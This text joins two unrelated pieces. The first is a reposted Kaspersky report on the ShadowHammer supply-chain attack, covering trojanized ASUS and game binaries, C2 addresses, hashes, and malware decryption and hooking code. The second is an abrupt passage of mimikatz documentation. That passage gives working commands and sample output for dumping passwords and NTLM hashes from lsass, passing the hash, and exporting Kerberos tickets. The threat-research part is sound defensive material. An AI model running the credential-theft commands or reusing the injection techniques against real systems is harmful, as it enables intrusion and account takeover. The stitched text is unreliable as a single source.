The same two certificates have been used in the past to sign at least 3000 legitimate ASUS files (i.e. ASUS GPU Tweak, ASUS PC Link and others), which makes it very hard to revoke them. All of the signed binaries share certain interesting features: none of them had a signing timestamp set, and the digest algorithm used was SHA1. The reason for this could be an attempt at hiding the time of the operation to make it harder to discover related forensic artefacts. Although there is no timestamp that can be relied on to understand when the attack started, there is a mandatory field in the certificate, "Certificate Validity Period", which can help us roughly establish the timeframe of the operation. Apparently, the attackers used two different certificates because the certificate they first relied on expired in 2018 and therefore had to be reissued. Another notable fact is that both abused certificates are from the DigiCert SHA2 Assured ID Code Signing CA. The legitimate ASUS binaries that we have observed use a different certificate, which was issued by the DigiCert EV Code Signing CA (SHA2). EV stands for "Extended Validation" and imposes stricter requirements on the party that intends to use the certificate, including hardware requirements. We believe that the attackers simply did not have access to a production signing device with an EV certificate. This indicates that the attackers most likely obtained a copy of the certificates or abused a system on the ASUS network that had the certificates installed. We do not know of all the malware-injected software they managed to sign, and we believe that the compromised signing certificates must be removed and revoked. Unfortunately, one month after this was reported to ASUS, newly released software (i.e. md5: 1b8d2459d4441b8f4a691aec18d08751) was still being signed with a compromised certificate. We immediately notified ASUS about this and provided evidence as required.
ASUS-related attack samples
Using the decrypted shellcode and code similarity, we found a number of related samples which appear to have been part of a parallel attack wave. These files have the following properties:
they contain the same shellcode style as the payload from the compromised ASUS Live Updater binaries, albeit unencrypted
they have a forgotten PDB path of "D:\C++\AsusShellCode\Release\AsusShellCode.pdb"
the shellcode from all of these samples connects to the same C2: asushotfix[.]com
all samples were compiled between June and July 2018
the samples have been detected on computers all around the globe
The hashes of these related samples include:
322cb39bc049aa69136925137906d855
36dd195269979e01a29e37c488928497
7d9d29c1c03461608bcab930fef2f568
807d86da63f0db1fc746d1f0b05bc357
849a2b0dc80aeca3d175c139efe5221c
86A4CAC227078B9C95C560C8F0370BF0
98908ce6f80ecc48628c8d2bf5b2a50c
a4b42c2c95d1f2ff12171a01c86cd64f
b4abe604916c04fe3dd8b9cb3d501d3f
eac3e3ece94bc84e922ec077efb15edd
128CECC59C91C0D0574BC1075FE7CB40
88777aacd5f16599547926a4c9202862
These files are dropped by larger setup files/installers, signed with an ASUS certificate (serial number: 0ff067d801f7daeeae842e9fe5f610ea, valid from 2015-07-27 to 2018-08-01). The hashes of the larger installers/droppers include:
0f49621b06f2cdaac8850c6e9581a594
17a36ac3e31f3a18936552aff2c80249
At this point, we do not know how they were used in these attacks or whether they were delivered via a different mechanism. These files were located in a "TEMP" subfolder of ASUS Live Updater, so it is possible that the software downloaded these files directly. Locations where these files were detected include:
asus\asus live update\temp\1\Setup.exe
asus\asus live update\temp\2\Setup.exe
asus\asus live update\temp\3\Setup.exe
asus\asus live update\temp\5\Setup.exe
asus\asus live update\temp\6\Setup.exe
asus\asus live update\temp\9\Setup.exe
Public reports of the attack
While investigating this case, we wondered how such a massive attack could go unnoticed on the Internet. Searching for any kind of evidence related to the attack, we came across a Reddit thread created in June 2018, where user GreyWolfx posted a screenshot of a suspicious-looking ASUS Live Update message. The message claims to be an "ASUS Critical Update" notification; however, the item does not have a name or version number. Other users commented in the thread, while some uploaded the suspicious updater to VirusTotal. The file uploaded to VT is not one of the malicious compromised updates; we can assume the person who uploaded it actually uploaded ASUS Live Update itself, as opposed to the update it received from the Internet.
Nevertheless, this could suggest that potentially compromised updates were delivered to users as far back as June 2018. In September 2018, another Reddit user, FabulaBerserko, also posted a message about a suspicious ASUS Live Update. Asus_USA replied to FabulaBerserko, suggesting he run a scan for viruses. In his message, FabulaBerserko talks about an update listed as critical, yet without a name and with a release date of March 2015. Interestingly, the related attack samples containing the PDB "AsusShellCode.pdb" have a compilation timestamp from 2015 as well, so it is possible that the Reddit user saw the delivery of one such file through ASUS Live Update in September 2018.
Targets by MAC address
We managed to crack all of the 600+ MAC address hashes and analyzed their distribution by manufacturer, using publicly available Ethernet-to-vendor assignment lists. It turns out that the distribution is uneven and certain vendors were a higher priority for the attackers. The chart below shows the statistics we collected based on network adapter manufacturers' names. Some of the MAC addresses included on the target list were rather common: for instance, 00-50-56-C0-00-08 belongs to the VMware virtual adapter VMnet8 and is the same for all users of a certain version of the VMware software for Windows. To prevent infection by mistake, the attackers paired it with a secondary MAC address from the real Ethernet card, which made the targeting more precise. Still, it tells us that one of the targeted users used VMware, which is rather common for software engineers (for testing their software). Another popular MAC was 0C-5B-8F-27-9A-64, which belongs to the virtual Ethernet adapter created by a Huawei USB 3G modem, model E3372h. It seems that all users of this device share the same MAC address.
Interaction with ASUS
The day after the ShadowHammer discovery, we created a short report for ASUS and approached the company through our local colleagues in Taiwan, providing all known details of the attack and hoping for cooperation. The following is a timeline of the discovery of this supply chain attack, together with the ASUS interaction and reporting:
29-Jan-2019 – initial discovery of the compromised ASUS Live Updater
30-Jan-2019 – created a preliminary report to be shared with ASUS, briefed Kaspersky Lab colleagues in Taipei
31-Jan-2019 – in-person meeting with ASUS, teleconference with researchers; we notified ASUS of the finding and shared a hard copy of the preliminary attack report with indicators of compromise and Yara rules. ASUS provided Kaspersky with the latest version of ASUS Live Updater, which was analyzed and found to be uninfected.
01-Feb-2019 – ASUS provided an archive of all ASUS Live Updater tools from 2018 onwards. None of them were infected, and they were signed with different certificates.
14-Feb-2019 – second face-to-face meeting with ASUS to discuss the details of the attack
20-Feb-2019 – update conference call with ASUS to provide newly found details about the attack
08-Mar-2019 – provided the list of targeted MAC addresses to ASUS, answered other questions related to the attack
08-Apr-2019 – provided a comprehensive report on the current attack investigation to ASUS
We appreciate the quick response from our ASUS colleagues just days before one of the largest holidays in Asia (Lunar New Year).
This helped us to confirm that the attack was in a deactivated stage, meaning there was no immediate risk of new infections, and it gave us more time to collect further artefacts. However, all compromised ASUS binaries had to be properly flagged as containing malware and removed from Kaspersky Lab users' computers.
Non-ASUS-related cases
In our search for similar malware, we came across other digitally signed binaries from three other vendors in Asia. One of these vendors is a game development company from Thailand known as Electronics Extreme Company Limited. The company has released digitally signed binaries of a video game called "Infestation: Survivor Stories", a zombie survival game in which players endure the hardships of a post-apocalyptic, zombie-infested world. According to Wikipedia, "the game was panned by critics and is considered one of the worst video games of all time", and its servers were taken offline on December 15, 2016. The history of this videogame itself contains many controversies. According to Wikipedia, it was originally developed under the title "The War Z" and released by OP Productions, which put it in the Steam store in December 2012. On April 4, 2013, the game servers were compromised, and the game source code was most probably stolen and released to the public. It seems that certain videogame companies picked up this available code and started making their own versions of the game. One such version (md5: de721e2f055f1b203ab561dda4377bab) was digitally signed by Innovative Extremist Co. LTD., a company from Thailand that currently provides web & IT infrastructure services. The game also contains a logo of Electronics Extreme Company Limited with a link to their website, and the homepage of Innovative Extremist listed Electronics Extreme as one of their partners. Notably, the certificate from Innovative Extremist that was used to sign Infestation is currently revoked. However, the story does not end here. It seems that Electronics Extreme picked up the video game where Innovative Extremist dropped it, and now the game seems to be causing trouble again: we found at least three samples of Infestation signed by Electronics Extreme with a certificate that must also be revoked. We believe that a poorly maintained development environment, leaked source code, as well as vulnerable production servers were at the core of the bad luck chasing this videogame. Ironically, this game about infestation brought only trouble and a serious infection to its developers.
Several executable files from the popular FPS videogame PointBlank contained a similar malware injection. The game was developed by the South Korean company Zepetto Co, whose digital signature was also abused. Although the certificate was still unrevoked as of early April, Zepetto seems to have stopped using it at the end of February 2019. While some details about this case were announced in March 2019 by our colleagues at ESET, we had been working on it in parallel with ESET and uncovered some additional facts.
All these cases involve digitally signed binaries from three vendors based in three different Asian countries. They are signed with different certificates and a unique chain of trust. What is common to these cases is the way the binaries were trojanized: the code injection happened through the modification of commonly used functions such as the CRT (C runtime), which is similar to the ASUS case. However, the implementation is very different in the case of the videogame companies.
In the ASUS case, the attackers only tampered with a compiled ASUS binary from 2015 and injected additional code. In the other cases, the binaries were recent (from the end of 2018). The malicious code was not inserted as a resource, nor did it overwrite the unused zero-filled space inside the programs. Instead, it seems to have been neatly compiled into the program, and in most cases, it starts at the beginning of the code section, as if it had been added even before the legitimate code. Even the data with the encrypted payload is stored inside this code section. This indicates that the attackers either had access to the source code of the victims' projects or injected the malware on the premises of the breached companies at the time of project compilation.
Payload from non-ASUS-related cases
The payload included in the compromised videogames is rather simple. First of all, it checks whether the process has administrative privileges. Next, it checks the registry value at HKCU\SOFTWARE\Microsoft\Windows\{0753-6681-BD59-8819}. If the value exists and is non-zero, the payload does not run further. Otherwise, it starts a new thread with malicious intent. The file contains a hardcoded miniconfig; an annotated example of the config is provided below.
C2 URL: https://nw.infestexe[.]com/version/last.php
Sleep time: 240000
Target Tag: warz
Unwanted processes: wireshark.exe;perfmon.exe;procmon64.exe;procmon.exe;procexp.exe;procexp64.exe;netmon.exe
Apparently, the backdoor was specifically created for this target, which is confirmed by the internal tag (the previous name of the game was "The War Z"). If any of the unwanted processes is running, or the system language ID is Simplified Chinese or Russian, the malware does not proceed. It also checks for the presence of a mutex named Windows-{0753-6681-BD59-8819}, which is also a sign to stop execution. After all checks are done, the malware gathers information about the system, including:
Network adapter MAC address
System username
System hostname and IP address
Windows version
CPU architecture
Current host FQDN
Domain name
Current executable file name
Drive C: volume name and serial number
Screen resolution
System default language ID
This information is concatenated into one string using the following template: "%s|%s|%s|%s|%s|%s|%s|%dx%d|%04x|%08X|%s|%s". Then the malware crafts a host identifier, which is made up of the C: drive serial number string XOR-ed with the hardcoded string "*&b0i0rong2Y7un1" and encoded with the Base64 algorithm, as sketched below. Later on, the C: serial number may be used by the attackers to craft unique backdoor code that runs only on a system with identical properties.
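A minimal Python sketch of that derivation follows. The hardcoded key is from the samples; the repeating-key XOR and the serial-number string format are assumptions, since the description above does not spell them out:

import base64
from itertools import cycle

KEY = b"*&b0i0rong2Y7un1"   # hardcoded string observed in the samples

def host_id(volume_serial: str) -> str:
    # XOR the serial-number string with the (repeating) key, then Base64 it
    xored = bytes(a ^ b for a, b in zip(volume_serial.encode(), cycle(KEY)))
    return base64.b64encode(xored).decode()

print(host_id("1A2B-3C4D"))  # the serial format here is illustrative only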
The malware uses HTTP for communication with the C2 server and crafts its HTTP headers on its own. It uses the following hardcoded User-Agent string: "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36". Interestingly, when the malware identifies the Windows version, it uses a long list:
Microsoft Windows NT 4.0
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows Me
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003
Microsoft Windows Server 2003 R2
Microsoft Windows Vista
Microsoft Windows Server 2008
Microsoft Windows 7
Microsoft Windows Server 2008 R2
Microsoft Windows 8
Microsoft Windows Server 2012
Microsoft Windows 8.1
Microsoft Windows Server 2012 R2
Microsoft Windows 10
Microsoft Windows Server 2016
The purpose of the code is to submit system information to the C2 server with a POST request and then send another GET request to receive a command to execute. The following commands were discovered:
DownUrlFile – download URL data to a file
DownRunUrlFile – download URL data to a file and execute it
RunUrlBinInMem – download URL data and run it as shellcode
UnInstall – set a registry flag to prevent the malware from starting
The UnInstall command sets the registry value HKCU\SOFTWARE\Microsoft\Windows\{0753-6681-BD59-8819} to 1, which prevents the malware from contacting the C2 again. No files are deleted from the disk, so the files should be discoverable through forensic analysis.
Similarities between the ASUS attack and the non-ASUS-related cases
Although the ASUS case and the videogame industry cases contain certain differences, they are very similar. Let us briefly mention some of the similarities. For instance, the algorithm used to calculate API function hashes (in the trojanized games) resembles the one used in the backdoored ASUS Updater tool:

# ASUS case
hash = 0
for c in string:
    hash = hash * 0x21
    hash = hash + c
return hash

# Other cases
hash = 0
for c in string:
    hash = hash * 0x83
    hash = hash + c
return hash & 0x7FFFFFFF

Pseudocode of the API hashing algorithm, ASUS case vs. other cases. Besides that, our behavior engine identified that the ASUS and other related samples are among the only cases where IPHLPAPI.dll was used from within a shellcode embedded in a PE file. In the ASUS case, the function GetAdaptersAddresses from IPHLPAPI.dll was used for calculating the hashes of MAC addresses. In the other cases, the function GetAdaptersInfo from IPHLPAPI.dll was used to retrieve information about the MAC addresses of the computer to pass to remote C&C servers.
ShadowPad connection
While investigating this case, we worked with several companies that had been abused in this wave of supply chain attacks. Our joint investigation revealed that the attackers deployed several tools on an attacked network, including a trojanized linker and a powerful backdoor packed with a recent version of VMProtect. Our analysis of the sophisticated backdoor (md5: 37e100dd8b2ad8b301b130c2bca3f1ea) that was deployed by the attackers on the company's internal network during the breach revealed that it was an updated version of the ShadowPad backdoor, which we reported on in 2017. The ShadowPad backdoor used in these cases has a very high level of complexity, which makes it almost impossible to reverse engineer. The newly updated version of ShadowPad follows the same principle as before.
The backdoor unwraps multiple stages of code before activating a system of plugins responsible for bootstrapping the main malicious functionality. As with ShadowPad, the attackers used at least two stages of C2 servers, where the first stage provides the backdoor with an encrypted next-stage C2 domain. The backdoor contains a hardcoded URL for C2 communication, which points to a publicly editable online Google document. Such online documents, which we extracted from several backdoors, were created by the same user under the name of Tom Giardino (hrsimon59@gmail[.]com), probably a reference to the spokesperson of Valve Corporation. These online documents contained an ASCII block of text marked as an RSA private key during the time of the operation. We noticed that inside the private key, normally encoded with base64, there was an invalid character injection (the symbol "$"). The message between the two "$" characters in fact contained an encrypted second-stage C2 URL. We managed to extract the history of changes and collected the following information indicating the time and C2 of ongoing operations in 2018:
Jul 31: UDP://103.19.3[.]17:443
Aug 13: UDP://103.19.3[.]17:443
Oct 08: UDP://103.19.3[.]17:443
Oct 09: UDP://103.19.3[.]17:443
Oct 22: UDP://117.16.142[.]9:443
Nov 20: HTTPS://23.236.77[.]177:443
Nov 21: UDP://117.16.142[.]9:443
Nov 22: UDP://117.16.142[.]9:443
Nov 23: UDP://117.16.142[.]9:443
Nov 27: UDP://117.16.142[.]9:443
Nov 27: HTTPS://103.19.3[.]44:443
Nov 27: TCP://103.19.3[.]44:443
Nov 27: UDP://103.19.3[.]44:1194
Nov 27: HTTPS://23.236.77[.]175:443
Nov 29: HTTPS://23.236.77[.]175:443
Nov 29: UDP://103.19.3[.]43:443
Nov 30: HTTPS://23.236.77[.]177:443
The IP address range 23.236.64.0-23.236.79.255 belongs to the Chinese hosting company Aoyouhost LLC, incorporated in Los Angeles, CA. Another IP address (117.16.142[.]9) belongs to a range listed as the Korean Education Network and likely belongs to Konkuk University (konkuk.ac.kr). This IP address range has been previously reported by Avast as one of those related to the ShadowPad activity linked to the CCleaner incident. It seems that the ShadowPad attackers are still abusing the university's network to host their C2 infrastructure. The last one, 103.19.3[.]44, is located in Japan but seems to belong to a Chinese ISP known as "xTom Shanghai Limited". When connected to via the IP address, the server displays an error page from a Chinese web management software called BaoTa ("宝塔" in Chinese).
PlugX connection
While analyzing the malicious payload injected into the signed ASUS Live Updater binaries, we came across a simple custom encryption algorithm used in the malware. We found that ShadowHammer reused algorithms seen in multiple malware samples, including many PlugX samples. PlugX is a backdoor quite popular among Chinese-speaking hacker groups. It had previously been seen in the Codoso, MenuPass and Hikit attacks. Some of the samples we found (i.e. md5: 5d40e86b09e6fe1dedbc87457a086d95) were created as early as 2012, if the compilation timestamp is anything to trust. Apparently, both pieces of code share the same constants (0x11111111, 0x22222222, 0x33333333, 0x44444444), but also implement identical algorithms to decrypt data, summarized in the Python function below.
from ctypes import c_uint32
from struct import pack, unpack

def decrypt(data):
    p1 = p2 = p3 = p4 = unpack("<L", data[0:4])[0]
    pos = 0
    decdata = ""
    while pos < len(data):
        p1 = c_uint32(p1 + (p1 >> 3) - 0x11111111).value
        p2 = c_uint32(p2 + (p2 >> 5) - 0x22222222).value
        p3 = c_uint32(p3 - (p3 << 7) + 0x33333333).value
        p4 = c_uint32(p4 - (p4 << 9) + 0x44444444).value
        decdata += chr(ord(data[pos]) ^ ((p1 % 256 + p2 % 256 + p3 % 256 + p4 % 256) % 256))
        pos += 1
    return decdata

While this does not indicate a strong connection to the PlugX creators, the reuse of the algorithm is unusual and may suggest that the ShadowHammer developers had some experience with the PlugX source code, and possibly compiled and used PlugX in some other attacks in the past.
Compromising software developers
All of the analyzed ASUS Live Updater binaries were backdoored using the same executable file, patched by an external malicious application that implemented malware injection on demand. After that, the attackers signed the executable and delivered it to the victims via the ASUS update servers, which was detected by Kaspersky Lab products. However, in the non-ASUS cases, the malware was seamlessly integrated into the code of recently compiled legitimate applications, which suggests that a different technique was used. Our deep search revealed another malware injection mechanism, which comes from a trojanized development environment used by software coders in the organization. In late 2018, we found a suspicious sample of the link.exe tool uploaded to a public malware scanning service. The tool is part of Microsoft Visual Studio, a popular integrated development environment (IDE) used for creating applications for Microsoft Windows. The same user also uploaded digitally signed compromised executables and some of the backdoors used in the same campaign. The attack comprises an infected Microsoft Incremental Linker and a malicious DLL module that gets loaded through the compromised linker. The malicious DLL hooks the file-open operation and redirects attempts to open a commonly used C++ runtime library during static linking. The redirect destination is a malicious .lib file, which gets linked into the target software instead of the legitimate library. The code also carefully checks which executable is being linked and applies the file redirection only if the name matches a hardcoded target file name. So, was it a developer from a videogame company who installed the trojanized version of the development software, or did the attackers deploy the Trojan code after compromising the developer's machine? This currently remains unknown. While we could not identify how the attackers managed to replace key files in the integrated development environment, this should serve as a wakeup call to all software developers. If your company produces software, you should ask yourself:
Where does my development software come from?
Is the delivery process (download) of IDE distributions secure?
When did we last check the integrity of our development software?
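The redirect-on-open trick described above is easiest to picture with a toy analogy in Python. This is an illustration of the concept only, not the attackers' code (which hooked native file APIs inside link.exe), and the library names are hypothetical:

import builtins

REDIRECTS = {"libcmt.lib": "evil_libcmt.lib"}   # hypothetical file names

_real_open = builtins.open

def hooked_open(path, *args, **kwargs):
    name = str(path)
    for target, replacement in REDIRECTS.items():
        if name.endswith(target):                # only the targeted library
            name = name[: -len(target)] + replacement
            break
    return _real_open(name, *args, **kwargs)

builtins.open = hooked_open                      # every open() is now filtered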
Other victims
During the analysis of samples related to the updated ShadowPad arsenal, we discovered one unusual backdoor executable (md5: 092ae9ce61f6575344c424967bd79437). It comes as a DLL installed as a service that indirectly listens on TCP port 80 on the target system and responds to a specific URL schema, registered with the Windows HTTP Service API: http://+/requested.html. The malware responds to HTTP GET/POST requests using this schema and is not easy to discover, which can help it remain invisible for a long time. Based on the malware's network behavior, we identified three further, previously unknown victims: a videogame company, a conglomerate holding company and a pharmaceutical company, all based in South Korea. Their servers responded with a confirmation to the malware protocol, indicating that they were compromised. We are in the process of notifying the victim companies via our local regional channels. Considering that this type of malware is not widely used and is custom-built, we believe that the same threat actor or a related group is behind these further compromises. This expands the list of previously known targets.
Conclusions
While attacks on supply chain companies are not new, the current incident is a big landmark in the cyberattack landscape. Not only does it show that even reputable vendors may suffer from the compromise of digital certificates, but it also raises many concerns about the software development infrastructure of all other software companies. ShadowPad, a powerful threat actor, previously concentrated on hitting one company at a time. The current research revealed at least four companies compromised in a similar manner, with three more suspected to have been breached by the same attacker. How many more companies are compromised out there is not known. What is known is that ShadowPad succeeded in backdooring developer tools and, one way or another, injected malicious code into digitally signed binaries, subverting trust in this powerful defense mechanism. Does it mean that we should stop trusting digital signatures? No. But we definitely need to investigate all strange or anomalous behavior, even by trusted and signed applications. Software vendors should introduce another line in their software-building conveyor that additionally checks their software for potential malware injections even after the code is digitally signed. At this unprecedented scale of operations, it is still a mystery why the attackers reduced the impact by limiting payload execution to 600+ victims in the case of ASUS. We are also unsure who the ultimate victims were or where the attackers collected the victims' MAC addresses from. If you believe you are one of the victims, we recommend checking your MAC address using this free tool or the online check website. And if you discover that you have been targeted by this operation, please email us at shadowhammer@kaspersky.com. We will keep tracking the ShadowPad activities and inform you about new findings!
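As a side note for defenders: the fixed http://+/requested.html schema described in the "Other victims" section above lends itself to a crude triage probe. The sketch below only flags hosts that answer that exact path at all; the actual request/response format of the malware protocol is not public, so treat any hit as a reason to investigate, not as proof of compromise:

import urllib.request

def probe(host: str, timeout: float = 5.0) -> bool:
    url = f"http://{host}/requested.html"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as r:
            return r.getcode() == 200   # heuristic only
    except Exception:
        return False

if probe("192.0.2.10"):   # documentation address - replace with your own host
    print("host answers the suspicious URL schema - investigate")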
Indicators of compromise C2 servers: 103.19.3[.]17 103.19.3[.]43 103.19.3[.]44 117.16.142[.]9 23.236.77[.]175 23.236.77[.]177 Malware samples and trojanized files: 02385ea5f8463a2845bfe362c6c659fa 915086d90596eb5903bcd5b02fd97e3e 04fb0ccf3ef309b1cd587f609ab0e81e 943db472b4fd0c43428bfc6542d11913 05eacf843b716294ea759823d8f4ab23 95b6adbcef914a4df092f4294473252f 063ff7cc1778e7073eacb5083738e6a2 98908ce6f80ecc48628c8d2bf5b2a50c 06c19cd73471f0db027ab9eb85edc607 9d86dff1a6b70bfdf44406417d3e068f 0e1cc8693478d84e0c5e9edb2dc8555c a17cb9df43b31bd3dad620559d434e53 0f49621b06f2cdaac8850c6e9581a594 a283d5dea22e061c4ab721959e8f4a24 128cecc59c91c0d0574bc1075fe7cb40 a4b42c2c95d1f2ff12171a01c86cd64f 17a36ac3e31f3a18936552aff2c80249 a76a1fbfd45ad562e815668972267c70 1a0752f14f89891655d746c07da4de01 a96226b8c5599e3391c7b111860dd654 1b95ac1443eb486924ac4d399371397c a9c750b7a3bbf975e69ef78850af0163 1d05380f3425d54e4ddfc4bacc21d90e aa15eb28292321b586c27d8401703494 1e091d725b72aed432a03a505b8d617e aac57bac5f849585ba265a6cd35fde67 2ffc4f0e240ff62a8703e87030a96e39 aafe680feae55bb6226ece175282f068 322cb39bc049aa69136925137906d855 abbb53e1b60ab7044dd379cf80042660 343ad9d459f4154d0d2de577519fb2d3 abbd7c949985748c353da68de9448538 36dd195269979e01a29e37c488928497 b042bc851cafd77e471fa0d90a082043 3c0a0e95ccedaaafb4b3f6fd514fd087 b044cd0f6aae371acf2e349ef78ab39e 496c224d10e1b39a22967a331f7de0a2 b257f366a9f5a065130d4dc99152ee10 4b8d5ae0ad5750233dc1589828da130b b4abe604916c04fe3dd8b9cb3d501d3f 4fb4c6da73a0a380c6797e9640d7fa00 b572925a7286355ac9ebb12a9fc0cc79 5220c683de5b01a70487dac2440e0ecb b96bd0bda90d3f28d3aa5a40816695ed 53886c6ebd47a251f11b44869f67163d c0116d877d048b1ba87c0de6fd7c3fb2 55a7aa5f0e52ba4d78c145811c830107 c778fc8e816061420c537db2617e0297 5855ce7c4a3167f0e006310eb1c76313 cdb0a09067877f30189811c7aea3f253 5b6cd0a85996a7d47a8e9f8011d4ad3f d07e6abebcf1f2119622c60ad0acf4fa 5eed18254d797ccea62d5b74d96b6795 d1ed421779c31df2a059fe0f91c24721 6186b317c8b6a9da3ca4c166e68883ea d4c4813b21556dd478315734e1c7ae54 63606c861a63a8c60edcd80923b18f96 dc15e578401ad9b8f72c4d60b79fdf0f 63f2fe96de336b6097806b22b5ab941a dca86d2a9eb6dc53f549860f103486a9 6ab5386b5ad294fc6ec4d5e47c9c2470 dd792f9185860e1464b4346254b2101b 6b38c772b2ffd7a7818780b29f51ccb2 e7dcfa8e75b0437975ce0b2cb123dc7b 6cf305a34a71b40c60722b2b47689220 e8db4206c2c12df7f61118173be22c89 6e94b8882fe5865df8c4d62d6cff5620 ea3b7770018a20fc7c4541c39ea271af 7d9d29c1c03461608bcab930fef2f568 eac3e3ece94bc84e922ec077efb15edd 807d86da63f0db1fc746d1f0b05bc357 ecf865c95a9bec46aa9b97060c0e317d 849a2b0dc80aeca3d175c139efe5221c ef43b55353a34be9e93160bb1768b1a6 8505484efde6a1009f90fa02ca42f011 f0ba34be0486037913e005605301f3ce 8578f0c7b0a14f129cc66ee236c58050 f2f879989d967e03b9ea0938399464ab 86a4cac227078b9c95c560c8f0370bf0 f4edc757e9917243ce513f22d0ccacf2 8756bafa7f0a9764311d52bc792009f9 f9d46bbffa1cbd106ab838ee0ccc5242 87a8930e88e9564a30288572b54faa46 fa83ffde24f149f9f6d1d8bc05c0e023 88777aacd5f16599547926a4c9202862 fa96e56e7c26515875214eec743d2db5 8baa46d0e0faa2c6a3f20aeda2556b18 fb1473e5423c8b82eb0e1a40a8baa118 8ef2d715f3a0a3d3ebc989b191682017 fcfab508663d9ce519b51f767e902806 092ae9ce61f6575344c424967bd79437 7f05d410dc0d1b0e7a3fcc6cdda7a2ff eb37c75369046fb1076450b3c34fb8ab Sursa: https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/
-
module ~ sekurlsa
This module extracts passwords, keys, pin codes and tickets from the memory of the lsass (Local Security Authority Subsystem Service) process by default, or from a minidump of it! (see: howto ~ get passwords by memory dump for minidump and other dump instructions)
When working with the lsass process, mimikatz needs some rights; choose one:
Administrator, to get the debug privilege via privilege::debug
SYSTEM account, via post-exploitation tools, scheduled tasks, psexec -s ... (in this case the debug privilege is not needed)
Without rights to access the lsass process, all commands will fail with an error like this: ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005) (except when working with a minidump). So, do not hesitate to start with:
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # log sekurlsa.log
Using 'sekurlsa.log' for logfile : OK
...before other commands.
The information that can be extracted depends on the version of Windows and the authentication methods: [en] http://1drv.ms/1fCWkhu
Starting with Windows 8.x and 10, by default, there is no password in memory. Exceptions:
When the DC(s) are unreachable, the kerberos provider keeps passwords for future negotiation;
When HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest, UseLogonCredential (DWORD) is set to 1, the wdigest provider keeps passwords;
When Allow* values are set in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Credssp\PolicyDefaults or HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation, the tspkg / CredSSP provider keeps passwords.
Of course, none of this applies when using Credential Guard.
Commands: logonpasswords, pth, tickets, ekeys, dpapi, minidump, process, searchpasswords, msv, wdigest, kerberos, tspkg, livessp, ssp, credman
logonpasswords
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 88038 (00000000:000157e6)
Session : Interactive from 1
User Name : Gentil Kiwi
Domain : vm-w7-ult
SID : S-1-5-21-2044528444-627255920-3055224092-1000
msv :
[00000003] Primary
* Username : Gentil Kiwi
* Domain : vm-w7-ult
* LM : d0e9aee149655a6075e4540af1f22d3b
* NTLM : cc36cf7a8514893efccd332446158b1a
* SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
tspkg :
* Username : Gentil Kiwi
* Domain : vm-w7-ult
* Password : waza1234/
wdigest :
* Username : Gentil Kiwi
* Domain : vm-w7-ult
* Password : waza1234/
kerberos :
* Username : Gentil Kiwi
* Domain : vm-w7-ult
* Password : waza1234/
ssp : [00000000]
* Username : admin
* Domain : nas
* Password : anotherpassword
credman : [00000000]
* Username : nas\admin
* Domain : nas.chocolate.local
* Password : anotherpassword
pth (Pass-The-Hash)
mimikatz can perform the well-known 'Pass-The-Hash' operation to run a process under other credentials, using the NTLM hash of the user's password instead of the real password. For this, it starts a process with a fake identity, then replaces the fake information (the NTLM hash of the fake password) with the real information (the NTLM hash of the real password).
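For reference, the NTLM hash that pth consumes is simply MD4 over the UTF-16LE encoding of the password. A small Python sketch (note that hashlib only exposes md4 if the local OpenSSL build provides it):

import hashlib

def ntlm(password: str) -> str:
    # NTLM = MD4(UTF-16LE(password)); md4 availability depends on OpenSSL
    return hashlib.new("md4", password.encode("utf-16le")).hexdigest()

print(ntlm("waza1234/"))  # cc36cf7a8514893efccd332446158b1a, as in the logs above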
Arguments:
/user - the username you want to impersonate; keep in mind that Administrator is not the only name for this well-known account.
/domain - the fully qualified domain name; for a local user/admin, use the computer or server name, a workgroup, or whatever.
/rc4 or /ntlm - optional - the RC4 key / NTLM hash of the user's password.
/aes128 - optional - the AES128 key derived from the user's password and the realm of the domain.
/aes256 - optional - the AES256 key derived from the user's password and the realm of the domain.
/run - optional - the command line to run - default is: cmd, to have a shell.
mimikatz # sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a
user : Administrateur
domain : chocolate.local
program : cmd.exe
NTLM : cc36cf7a8514893efccd332446158b1a
| PID 712
| TID 300
| LUID 0 ; 362544 (00000000:00058830)
\_ msv1_0 - data copy @ 000F8AF4 : OK !
\_ kerberos - data copy @ 000E23B8
\_ rc4_hmac_nt OK
\_ rc4_hmac_old OK
\_ rc4_md4 OK
\_ des_cbc_md5 -> null
\_ des_cbc_crc -> null
\_ rc4_hmac_nt_exp OK
\_ rc4_hmac_old_exp OK
\_ *Password replace -> null
Also valid on recent Windows versions:
sekurlsa::pth /user:Administrateur /domain:chocolate.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
Remarks:
this command does not work with minidumps (nonsense);
it requires elevated privileges (privilege::debug or the SYSTEM account), unlike 'Pass-The-Ticket', which uses an official API;
this new version of 'Pass-The-Hash' replaces the RC4 keys of Kerberos with the NTLM hash (and/or replaces the AES keys) - this permits the Kerberos provider to request TGT tickets!;
the NTLM hash is mandatory on XP/2003/Vista/2008, and on 7/2008r2/8/2012 before kb2871997 (AES not available or replaceable);
AES keys can be replaced only on 8.1/2012r2, or on 7/2008r2/8/2012 with kb2871997; in this case you can avoid the NTLM hash.
See also: Pass-The-Ticket: kerberos::ptt; Golden Ticket: kerberos::golden
tickets
List and export the Kerberos tickets of all sessions. Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can access tickets of other sessions (users).
Argument: /export - optional - tickets are exported as .kirbi files. Their names start with the user's LUID and the group number (0 = TGS, 1 = client ticket(?) and 2 = TGT).
